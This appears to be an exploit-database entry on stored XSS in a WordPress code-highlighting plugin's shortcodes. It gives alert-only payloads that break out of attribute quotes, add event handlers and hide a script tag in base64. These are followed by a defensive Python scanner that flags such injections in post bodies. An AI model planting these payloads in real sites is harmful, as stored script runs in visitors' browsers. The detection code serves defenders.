## https://sploitus.com/exploit?id=WPEX-ID:51855853-E7BD-425F-802C-824209F4F84D
This contains three XSS payloads, each injected at a different location.

[prismatic_code class='hello" style="animation-name:twentytwentyone-close-button-transition;" onanimationstart="alert(1)']
[prismatic_encoded style=%%animation-name:twentytwentyone-close-button-transition;%% onanimationstart=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


The first two payloads, which rely on animation-name/onanimationstart, are specific to the Twenty Twenty-One theme and are triggered without any user interaction other than accessing the page.

To try with another theme (requires the user to click on the generated elements in the page to trigger the first two XSS):
[prismatic_code class='hello" onclick="alert(1)']
[prismatic_encoded onclick=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+ = base64("<script>alert(origin)</script>")
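
For defenders auditing stored content, the following is an added example (not part of the original entry and not the plugin's code) that scans raw post bodies for the three injection points shown above. The function name `scan_post`, the finding strings and the idea of feeding it exported post content are assumptions of this example.

```python
import base64
import binascii
import re

# Opening tag of either shortcode named on the page, plus its raw attribute text.
TAG = re.compile(r"\[(prismatic_code|prismatic_encoded)\b([^\]]*)\]")
# Base64 body wrapped by [prismatic_encoded]...[/prismatic_encoded].
ENCODED_BODY = re.compile(
    r"\[prismatic_encoded\b[^\]]*\]([A-Za-z0-9+/=\s]+)\[/prismatic_encoded\]")
# Inline event-handler attribute such as onclick= or onanimationstart=.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)
# A double quote inside a single-quoted value can close the rendered HTML attribute.
QUOTE_BREAKOUT = re.compile(r"'[^']*\"[^']*'")
# Active markup in a decoded body: worth a review, since it is only safe if escaped.
ACTIVE_MARKUP = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.I)


def scan_post(content):
    """Return (shortcode, reason) findings for one post body (hypothetical helper)."""
    findings = []
    for name, attrs in TAG.findall(content):
        if EVENT_HANDLER.search(attrs):
            findings.append((name, "event handler in shortcode attributes"))
        if QUOTE_BREAKOUT.search(attrs):
            findings.append((name, "quote breakout in attribute value"))
    for body in ENCODED_BODY.findall(content):
        try:
            decoded = base64.b64decode("".join(body.split())).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        if ACTIVE_MARKUP.search(decoded):
            findings.append(("prismatic_encoded", "decoded body contains active markup"))
    return findings


# Sample posts: the first is the theme-independent variant shown on this page,
# the second is a constructed benign post.
SAMPLE_FLAGGED = (
    "[prismatic_code class='hello\" onclick=\"alert(1)']\n"
    "[prismatic_encoded onclick=%%alert(2)%%]"
    "PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]\n"
    "[/prismatic_code]"
)
SAMPLE_BENIGN = '[prismatic_code class="language-php"]echo 1;[/prismatic_code]'

if __name__ == "__main__":
    for finding in scan_post(SAMPLE_FLAGGED) + scan_post(SAMPLE_BENIGN):
        print(finding)
```

A decoded body containing `<script` can be a legitimate code sample, so that finding is a prompt for review rather than proof of injection.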